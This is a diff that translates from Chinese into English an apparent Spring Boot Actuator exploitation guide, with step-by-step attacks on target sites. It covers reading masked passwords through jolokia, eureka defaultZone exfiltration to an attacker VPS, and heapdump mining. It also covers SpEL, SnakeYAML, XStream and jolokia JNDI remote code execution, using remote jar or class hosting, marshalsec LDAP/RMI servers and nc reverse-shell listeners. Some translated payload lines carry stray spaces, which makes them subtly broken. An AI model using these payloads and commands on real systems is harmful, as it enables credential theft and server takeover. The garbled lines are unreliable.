secret) with * to achieve desensitization effect -#### 利用条件: +#### Use conditions: -- 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 -- 目标使用了 `jolokia-core` 依赖(版本要求暂未知) +- The target website exists `/jolokia` or `/actuator/jolokia` interface +- The target uses the `jolokia-core` dependency (version requirements are not yet known) -#### 利用方法: +#### How to use: -##### 步骤一: 找到想要获取的属性名 +##### Step 1: Find the attribute name you want to get -GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 +GET requests the `/env` or `/actuator/env` interface of the target website, search for the `******` keyword, and find the attribute name corresponding to the attribute value masked by the asterisk *. -##### 步骤二: jolokia 调用相关 Mbean 获取明文 +##### Step 2: Jolokia calls related Mbeans to obtain plaintext -将下面示例中的 `security.user.password` 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 `value` 键中。 +Replace `security.user.password` in the example below with the actual attribute name to be obtained, and send the packet directly; the plaintext value result is included in the `value` key in the response packet. -- 调用 `org.springframework.boot` Mbean +- Call `org.springframework.boot` Mbean -> 实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法 +> Actually call the getProperty method of the org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar class instance spring 1.x @@ -409,7 +410,7 @@ spring 1.x POST /jolokia Content-Type: application/json -{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} +{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"] } ``` spring 2.x @@ -418,15 +419,15 @@ spring 2.x POST /actuator/jolokia Content-Type: application/json -{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} +{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"] } ``` -- 调用 `org.springframework.cloud.context.environment` Mbean +- Call `org.springframework.cloud.context.environment` Mbean -> 实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法 +> Actually call the getProperty method of the org.springframework.cloud.context.environment.EnvironmentManager class instance spring 1.x @@ -434,7 +435,7 @@ spring 1.x POST /jolokia Content-Type: application/json -{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} +{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user .password"]} ``` spring 2.x @@ -443,40 +444,40 @@ spring 2.x POST /actuator/jolokia Content-Type: application/json -{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} +{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user .password"]} ``` -- 调用其他 Mbean +- Call other Mbeans -> 目标具体情况和存在的 Mbean 可能不一样,可以搜索 getProperty 等关键词,寻找可以调用的方法。 +> The specific situation of the target may be different from the existing Mbean. You can search for keywords such as getProperty to find methods that can be called. -### 0x04:获取被星号脱敏的密码的明文 (方法二) +### 0x04: Obtain the plaintext of the password desensitized by asterisks (method 2) -#### 利用条件: +#### Use conditions: -- 可以 GET 请求目标网站的 `/env` -- 可以 POST 请求目标网站的 `/env` -- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) -- 目标使用了 `spring-cloud-starter-netflix-eureka-client` 依赖 -- 目标可以请求攻击者的服务器(请求可出外网) +- You can GET the `/env` of the target website +- You can POST to `/env` of the target website +- You can POST to request the `/refresh` interface of the target website to refresh the configuration (there is `spring-boot-starter-actuator` dependency) +- The target uses the `spring-cloud-starter-netflix-eureka-client` dependency +- The target can request the attacker's server (the request can go out of the Internet) -#### 利用方法: +#### How to use: -##### 步骤一: 找到想要获取的属性名 +##### Step 1: Find the attribute name you want to get -GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 +GET requests the `/env` or `/actuator/env` interface of the target website, search for the `******` keyword, and find the attribute name corresponding to the attribute value masked by the asterisk *. -##### 步骤二: 使用 nc 监听 HTTP 请求 +##### Step 2: Use nc to monitor HTTP requests -在自己控制的外网服务器上监听 80 端口: +Listen to port 80 on the external network server controlled by yourself: ```bash nc -lvk 80 @@ -484,11 +485,11 @@ nc -lvk 80 -##### 步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性 +##### Step 3: Set the eureka.client.serviceUrl.defaultZone property -将下面 `http://value:${security.user.password}@your-vps-ip` 中的 `security.user.password` 换成自己想要获取的对应的星号 * 遮掩的属性名; +Replace `security.user.password` in `http://value:${security.user.password}@your-vps-ip` below with the corresponding asterisk * masked attribute name you want to obtain; -`your-vps-ip` 换成自己外网服务器的真实 ip 地址。 +`your-vps-ip` is replaced with the real ip address of your external network server. @@ -512,7 +513,7 @@ Content-Type: application/json -##### 步骤四: 刷新配置 +##### Step 4: Refresh configuration spring 1.x @@ -532,40 +533,40 @@ Content-Type: application/json -##### 步骤五: 解码属性值 +##### Step 5: Decoding property values -正常的话,此时 nc 监听的服务器会收到目标发来的请求,其中包含类似如下 `Authorization` 头内容: +If it is normal, the server monitored by nc will receive the request from the target at this time, which contains the following `Authorization` header content: ``` Authorization: Basic dmFsdWU6MTIzNDU2 ``` -将其中的 `dmFsdWU6MTIzNDU2`部分使用 base64 解码,即可获得类似明文值 `value:123456`,其中的 `123456` 即是目标星号 * 脱敏前的属性值明文。 +Use base64 to decode the `dmFsdWU6MTIzNDU2` part, and you can get the plaintext value `value:123456`, where `123456` is the plaintext of the target asterisk * attribute value before desensitization. -### 0x05:获取被星号脱敏的密码的明文 (方法三) +### 0x05: Obtain the plaintext of the password desensitized by asterisks (method 3) -#### 利用条件: +#### Use conditions: -- 通过 POST `/env` 设置属性触发目标对外网指定地址发起任意 http 请求 -- 目标可以请求攻击者的服务器(请求可出外网) +- Set the attribute through POST `/env` to trigger the target to initiate any http request to the specified address on the external network +- The target can request the attacker's server (the request can go out of the Internet) -#### 利用方法: +#### How to use: -> 参考 UUUUnotfound 提出的 [issue-1](https://github.com/LandGrey/SpringBootVulExploit/issues/1),可以在目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据 +> Referring to [issue-1](https://github.com/LandGrey/SpringBootVulExploit/issues/1) proposed by UUUUnotfound, you can use placeholders in the url path to bring out data when the target sends an external http request -##### 步骤一: 找到想要获取的属性名 +##### Step 1: Find the attribute name you want to get -GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 +GET requests the `/env` or `/actuator/env` interface of the target website, search for the `******` keyword, and find the attribute name corresponding to the attribute value masked by the asterisk *. -##### 步骤二: 使用 nc 监听 HTTP 请求 +##### Step 2: Use nc to monitor HTTP requests -在自己控制的外网服务器上监听 80 端口: +Listen to port 80 on the external network server controlled by yourself: ```bash nc -lvk 80 @@ -573,9 +574,9 @@ nc -lvk 80 -##### 步骤三: 触发对外 http 请求 +##### Step 3: Trigger an external http request -- `spring.cloud.bootstrap.location` 方法(**同时适用于**明文数据中有特殊 url 字符的情况) +- `spring.cloud.bootstrap.location` method (**also applies to cases where there are special url characters in plaintext data) spring 1.x @@ -597,7 +598,7 @@ Content-Type: application/json -- `eureka.client.serviceUrl.defaultZone` 方法(**不适用于**明文数据中有特殊 url 字符的情况) +- `eureka.client.serviceUrl.defaultZone` method (**not applicable** when there are special url characters in plaintext data) spring 1.x @@ -619,7 +620,7 @@ Content-Type: application/json -##### 步骤四: 刷新配置 +##### Step 4: Refresh configuration spring 1.x @@ -637,76 +638,76 @@ Content-Type: application/json ``` -### 0x06:获取被星号脱敏的密码的明文 (方法四) +### 0x06: Obtain the plaintext of the password desensitized by asterisks (method 4) -> 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 +> When accessing the /env interface, spring actuator will replace the attribute values corresponding to some attribute names with sensitive keywords (such as password, secret) with * to achieve desensitization effect -#### 利用条件: +#### Use conditions: -- 可正常 GET 请求目标 `/heapdump` 或 `/actuator/heapdump` 接口 +- Can normally GET request target `/heapdump` or `/actuator/heapdump` interface -#### 利用方法: +#### How to use: -##### 步骤一: 找到想要获取的属性名 +##### Step 1: Find the attribute name you want to get -GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 +GET requests the `/env` or `/actuator/env` interface of the target website, search for the `******` keyword, and find the attribute name corresponding to the attribute value masked by the asterisk *. -##### 步骤二: 下载 jvm heap 信息 +##### Step 2: Download jvm heap information -> 下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G +> The size of the downloaded heapdump file is usually between 50M and 500M, and sometimes it may be larger than 2G -`GET` 请求目标的 `/heapdump` 或 `/actuator/heapdump` 接口,下载应用实时的 JVM 堆信息 +`GET` requests the `/heapdump` or `/actuator/heapdump` interface of the target to download the real-time JVM heap information of the application -##### 步骤三: 使用 MAT 获得 jvm heap 中的密码明文 +##### Step 3: Use MAT to get the password plaintext in the jvm heap -参考 [文章](https://landgrey.me/blog/16/) 方法,使用 [Eclipse Memory Analyzer](https://www.eclipse.org/mat/downloads.php) 工具的 **OQL** 语句 +Refer to the [article](https://landgrey.me/blog/16/) method, use the **OQL** of the [Eclipse Memory Analyzer](https://www.eclipse.org/mat/downloads.php) tool sentence ``` select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password")) -或 +or select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password")) ``` -辅助用 "**password**" 等关键词快速过滤分析,获得密码等相关敏感信息的明文。 +Use keywords such as "**password**" to quickly filter and analyze to obtain the plaintext of relevant sensitive information such as passwords. -## 二:远程代码执行 +## Two: Remote code execution -> 由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的,所以有些漏洞名字起的不太正规,以能区分为准 +> Since the spring boot-related vulnerabilities may be caused by a combination of multiple component vulnerabilities, some of the vulnerability names are not formal, whichever can be distinguished -### 0x01:whitelabel error page SpEL RCE +### 0x01: whitelabel error page SpEL RCE -#### 利用条件: +#### Use conditions: -- spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0 -- 至少知道一个触发 springboot 默认错误页面的接口及参数名 +- spring boot 1.1.0-1.1.12, 1.2.0-1.2.7, 1.3.0 +- Know at least one interface and parameter name that triggers the springboot default error page -#### 利用方法: +#### How to use: -##### 步骤一:找到一个正常传参处 +##### Step 1: Find a normal reference point -比如发现访问 `/article?id=xxx` ,页面会报状态码为 500 的错误: `Whitelabel Error Page`,则后续 payload 都将会在参数 id 处尝试。 +For example, if you find access to `/article?id=xxx`, the page will report an error with status code 500: `Whitelabel Error Page`, then subsequent payloads will be tried at the parameter id. -##### 步骤二:执行 SpEL 表达式 +##### Step 2: Execute the SpEL expression -输入 `/article?id=${7*7}` ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。 +Enter `/article?id=${7*7}`, if you find that the error page calculates the value 49 of 7*7 and displays it on the error page, you can basically confirm that the target has a SpEL expression injection vulnerability. -由字符串格式转换成 `0x**` java 字节形式,方便执行任意代码: +Convert from string format to `0x**` java byte form, which is convenient for executing arbitrary code: ```python # coding: utf-8 @@ -714,69 +715,69 @@ select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("p result = "" target = 'open -a Calculator' for x in target: - result += hex(ord(x)) + "," -print(result.rstrip(',')) + result += hex(ord(x)) + "," +print(result. rstrip(',')) ``` -执行 `open -a Calculator` 命令 +Execute `open -a Calculator` command ```java -${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} +${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75 ,0x6c,0x61,0x74,0x6f,0x72}))} ``` -#### 漏洞原理: +#### Vulnerability principle: -1. spring boot 处理参数值出错,流程进入 `org.springframework.util.PropertyPlaceholderHelper` 类中 -2. 此时 URL 中的参数值会用 `parseStringValue` 方法进行递归解析 -3. 其中 `${}` 包围的内容都会被 `org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration` 类的 `resolvePlaceholder` 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞 +1. The spring boot processing parameter value is wrong, and the process enters the `org.springframework.util.PropertyPlaceholderHelper` class +2. At this time, the parameter value in the URL will be recursively parsed using the `parseStringValue` method +3. The content surrounded by `${}` will be parsed and executed by the `resolvePlaceholder` method of the `org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration` class as a SpEL expression, resulting in an RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [SpringBoot SpEL表达式注入漏洞-分析与复现](https://www.cnblogs.com/litlife/p/10183137.html) +​ [SpringBoot SpEL expression injection vulnerability - analysis and recurrence] (https://www.cnblogs.com/litlife/p/10183137.html) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-spel-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9091/article?id=66 ``` -执行 `open -a Calculator` 命令: +Execute the `open -a Calculator` command: ```java -http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} +http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20 ,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} ``` -### 0x02:spring cloud SnakeYAML RCE +### 0x02: spring cloud SnakeYAML RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) -- 目标依赖的 `spring-cloud-starter` 版本 < 1.3.0.RELEASE -- 目标可以请求攻击者的 HTTP 服务器(请求可出外网) +- You can POST request to the `/env` interface of the target website to set properties +- You can POST to request the `/refresh` interface of the target website to refresh the configuration (there is `spring-boot-starter-actuator` dependency) +- The target depends on `spring-cloud-starter` version < 1.3.0.RELEASE +- The target can request the attacker's HTTP server (the request can go out to the Internet) -#### 利用方法: +#### How to use: -##### 步骤一: 托管 yml 和 jar 文件 +##### Step 1: Host yml and jar files -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -784,23 +785,23 @@ python3 -m http.server 80 -在网站根目录下放置后缀为 `yml` 的文件 `example.yml`,内容如下: +Place the file `example.yml` with the suffix `yml` in the root directory of the website, the content is as follows: ```yaml -!!javax.script.ScriptEngineManager [ - !!java.net.URLClassLoader [[ - !!java.net.URL ["http://your-vps-ip/example.jar"] - ]] +!!javax.script.ScriptEngineManager[ + !!java.net.URLClassLoader[[ + !!java.net.URL ["http://your-vps-ip/example.jar"] + ]] ] ``` -在网站根目录下放置后缀为 `jar` 的文件 `example.jar`,内容是要执行的代码,代码编写及编译方式参考 [yaml-payload](https://github.com/artsploit/yaml-payload)。 +Place the file `example.jar` with the suffix of `jar` in the root directory of the website. The content is the code to be executed. Refer to [yaml-payload](https://github.com/artsploit/yaml- payload). -##### 步骤二: 设置 spring.cloud.bootstrap.location 属性 +##### Step 2: Set the spring.cloud.bootstrap.location property spring 1.x @@ -822,7 +823,7 @@ Content-Type: application/json -##### 步骤三: 刷新配置 +##### Step 3: Refresh configuration spring 1.x @@ -842,28 +843,28 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 -2. refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 -3. SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 -4. 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 -5. 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化 -6. 实例化类时执行恶意代码,造成 RCE 漏洞 +1. The spring.cloud.bootstrap.location property is set to the URL address of the external malicious yml file +2. refresh triggers the target machine to request the yml file on the remote HTTP server to obtain its content +3. Due to the deserialization vulnerability of SnakeYAML, it will complete the specified action when parsing malicious yml content +4. First trigger java.net.URL to pull the malicious jar file on the remote HTTP server +5. Then look for the class that implements the javax.script.ScriptEngineFactory interface in the jar file and instantiate it +6. Execute malicious code when instantiating a class, causing RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记](https://b1ngz.github.io/exploit-spring-boot-actuator-spring-cloud-env-note/) +​ [Exploit Spring Boot Actuator's Spring Cloud Env Study Notes](https://b1ngz.github.io/exploit-spring-boot-actuator-spring-cloud-env-note/) -#### 漏洞环境: +#### Vulnerability environment: [repository/springcloud-snakeyaml-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9092/env @@ -871,30 +872,30 @@ http://127.0.0.1:9092/env -### 0x03:eureka xstream deserialization RCE +### 0x03: eureka xstream deserialization RCE -#### 利用条件: +#### Use conditions: -- 可以 POST 请求目标网站的 `/env` 接口设置属性 -- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) -- 目标使用的 `eureka-client` < 1.8.7(通常包含在 `spring-cloud-starter-netflix-eureka-client` 依赖中) -- 目标可以请求攻击者的 HTTP 服务器(请求可出外网) +- You can POST request to the `/env` interface of the target website to set properties +- You can POST to request the `/refresh` interface of the target website to refresh the configuration (there is `spring-boot-starter-actuator` dependency) +- The target uses `eureka-client` < 1.8.7 (usually included in the `spring-cloud-starter-netflix-eureka-client` dependency) +- The target can request the attacker's HTTP server (the request can go out to the Internet) -#### 利用方法: +#### How to use: -##### 步骤一:架设响应恶意 XStream payload 的网站 +##### Step 1: Build a website that responds to the malicious XStream payload -提供一个依赖 Flask 并符合要求的 [python 脚本示例](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py),作用是利用目标 Linux 机器上自带的 python 来反弹shell。 +Provide a [python script example](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py) that depends on Flask and meets the requirements, the function is to use the built-in python to reverse the shell. -使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。 +Use python to run the above script on the server you control, and modify the ip address and port number of the rebound shell in the script according to the actual situation. -##### 步骤二:监听反弹 shell 的端口 +##### Step 2: Listen to the port of the rebound shell -一般使用 nc 监听端口,等待反弹 shell +Generally use nc to monitor the port and wait for the rebound shell ```bash nc -lvp 443 @@ -902,7 +903,7 @@ nc -lvp 443 -##### 步骤三:设置 eureka.client.serviceUrl.defaultZone 属性 +##### Step 3: Set the eureka.client.serviceUrl.defaultZone property spring 1.x @@ -924,7 +925,7 @@ Content-Type: application/json -##### 步骤四:刷新配置 +##### Step 4: Refresh configuration spring 1.x @@ -944,25 +945,25 @@ Content-Type: application/json -#### 漏洞原理: +#### Vulnerability principle: -1. eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址 -2. refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload -3. 目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞 +1. The eureka.client.serviceUrl.defaultZone property is set to a malicious external eureka server URL address +2. refresh triggers the target machine to request a remote URL, and the fake eureka server set up in advance will return a malicious payload +3. The target machine depends on parsing the payload, triggering XStream deserialization, causing RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [Spring Boot Actuator从未授权访问到getshell](https://www.freebuf.com/column/234719.html) +​ [Spring Boot Actuator unauthorized access to getshell](https://www.freebuf.com/column/234719.html) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-eureka-xstream-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-eureka-xstream-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9093/env @@ -970,32 +971,32 @@ http://127.0.0.1:9093/env -### 0x04:jolokia logback JNDI RCE +### 0x04: jolokia logback JNDI RCE -#### 利用条件: +#### Use conditions: -- 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 -- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean -- 目标可以请求攻击者的 HTTP 服务器(请求可出外网) +- The target website exists `/jolokia` or `/actuator/jolokia` interface +- The target uses `jolokia-core` dependencies (version requirements are not yet known) and related MBeans exist in the environment +- The target can request the attacker's HTTP server (the request can go out to the Internet) -- 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过 +- Ordinary JNDI injection is affected by the target JDK version, jdk < 6u201/7u191/8u182/11.0.1(LDAP), but the related environment can be bypassed -#### 利用方法: +#### How to use: -##### 步骤一:查看已存在的 MBeans +##### Step 1: View existing MBeans -访问 `/jolokia/list` 接口,查看是否存在 `ch.qos.logback.classic.jmx.JMXConfigurator` 和 `reloadByURL` 关键词。 +Visit the `/jolokia/list` interface to see if there are `ch.qos.logback.classic.jmx.JMXConfigurator` and `reloadByURL` keywords. -##### 步骤二:托管 xml 文件 +##### Step 2: Host the xml file -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 @@ -1003,33 +1004,33 @@ python3 -m http.server 80 -在根目录放置以 `xml` 结尾的 `example.xml` 文件,内容如下: +Place the `example.xml` file ending with `xml` in the root directory, the content is as follows: ```xml - + ``` -##### 步骤三:准备要执行的 Java 代码 +##### Step 3: Prepare the Java code to be executed -编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, +Write an optimized [Java sample code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java` for rebounding the shell, -使用兼容低版本 jdk 的方式编译: +Compile with a method compatible with lower versions of jdk: ```bash javac -source 1.5 -target 1.5 JNDIObject.java ``` -然后将生成的 `JNDIObject.class` 文件拷贝到 **步骤二** 中的网站根目录。 +Then copy the generated `JNDIObject.class` file to the website root directory in **Step 2**. -##### 步骤四:架设恶意 ldap 服务 +##### Step 4: Set up a malicious ldap service -下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务: +Download [marshalsec](https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding ldap service: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389 @@ -1037,9 +1038,9 @@ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:// -##### 步骤五:监听反弹 shell 的端口 +##### Step 5: Listen to the port of the rebound shell -一般使用 nc 监听端口,等待反弹 shell +Generally use nc to monitor the port and wait for the rebound shell ```bash nc -lv 443 @@ -1047,11 +1048,11 @@ nc -lv 443 -##### 步骤六:从外部 URL 地址加载日志配置文件 +##### Step 6: Load the log configuration file from the external URL address -> ⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。 +> ⚠️ If the target successfully requests example.xml and marshalsec also receives the target request, but the target does not request JNDIObject.class, the high probability is that the jdk version of the target environment is too high, resulting in JNDI utilization failure. -替换实际的 your-vps-ip 地址访问 URL 触发漏洞: +Replace the actual your-vps-ip address to access the URL to trigger the vulnerability: ``` /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml @@ -1059,27 +1060,28 @@ nc -lv 443 -#### 漏洞原理: +#### Vulnerability principle: -1. 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 `ch.qos.logback.classic.jmx.JMXConfigurator` 类的 `reloadByURL` 方法 -2. 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容 -3. 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞) -4. xml 文件中利用 `logback` 依赖的 `insertFormJNDI` 标签,设置了外部 JNDI 服务器地址 -5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞 +1. Direct access to the URL that can trigger the vulnerability is equivalent to calling the `reloadByURL` method of the `ch.qos.logback.classic.jmx.JMXConfigurator` class through jolokia +2. The target machine requests the URL address of the external log configuration file to obtain the content of the malicious xml file +3. The target machine uses saxParser.parse to parse the xml file (this leads to the xxe vulnerability) +4. Use `logback` dependency in xml file +`insertFormJNDI` tag, set the external JNDI server address +5. The target machine requests a malicious JNDI server, resulting in JNDI injection, resulting in an RCE vulnerability -#### 漏洞分析: +#### Vulnerability analysis: -​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) +​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) -#### 漏洞环境: +#### Vulnerability environment: [repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce) -正常访问: +Normal access: ``` http://127.0.0.1:9094/env @@ -1087,49 +1089,49 @@ http://127.0.0.1:9094/env -### 0x05:jolokia Realm JNDI RCE +### 0x05: jolokia Realm JNDI RCE -#### 利用条件: +#### Use conditions: -- 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 -- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean -- 目标可以请求攻击者的服务器(请求可出外网) -- 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121(RMI),但相关环境可绕过 +- The target website exists `/jolokia` or `/actuator/jolokia` interface +- The target uses `jolokia-core` dependencies (version requirements are not yet known) and related MBeans exist in the environment +- The target can request the attacker's server (the request can go out of the Internet) +- Normal JNDI injection is affected by the target JDK version, jdk < 6u141/7u131/8u121(RMI), but the related environment can be bypassed -#### 利用方法: +#### How to use: -##### 步骤一:查看已存在的 MBeans +##### Step 1: View existing MBeans -访问 `/jolokia/list` 接口,查看是否存在 `type=MBeanFactory` 和 `createJNDIRealm` 关键词。 +Visit the `/jolokia/list` interface to see if there are `type=MBeanFactory` and `createJNDIRealm` keywords. -##### 步骤二:准备要执行的 Java 代码 +##### Step 2: Prepare the Java code to be executed -编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`。 +Write an optimized [Java sample code](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java` for rebounding the shell. -##### 步骤三:托管 class 文件 +##### Step 3: Manage class files -在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) +Open a simple HTTP server on the vps machine controlled by yourself, and use common HTTP service ports (80, 443) as much as possible ```bash -# 使用 python 快速开启 http server +# Use python to quickly open http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` -将**步骤二**中编译好的 class 文件拷贝到 HTTP 服务器根目录。 +Copy the class file compiled in **Step 2** to the root directory of the HTTP server. -##### 步骤四:架设恶意 rmi 服务 +##### Step 4: Set up a malicious rmi service -下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 rmi 服务: +Download [marshalsec](https://github.com/mbechler/marshalsec), and use the following command to set up the corresponding rmi service: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389 @@ -1137,9 +1139,9 @@ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://y -##### 步骤五:监听反弹 shell 的端口 +##### Step 5: Listen to the port of the rebound shell -一般使用 nc 监听端口,等待反弹 shell +Generally use nc to monitor the port and wait for the rebound shell ```bash nc -lvp 443 @@ -1147,33 +1149,33 @@ nc -lvp 443 -##### 步骤六:发送恶意 payload +##### Step 6: Send malicious payload -根据实际情况修改 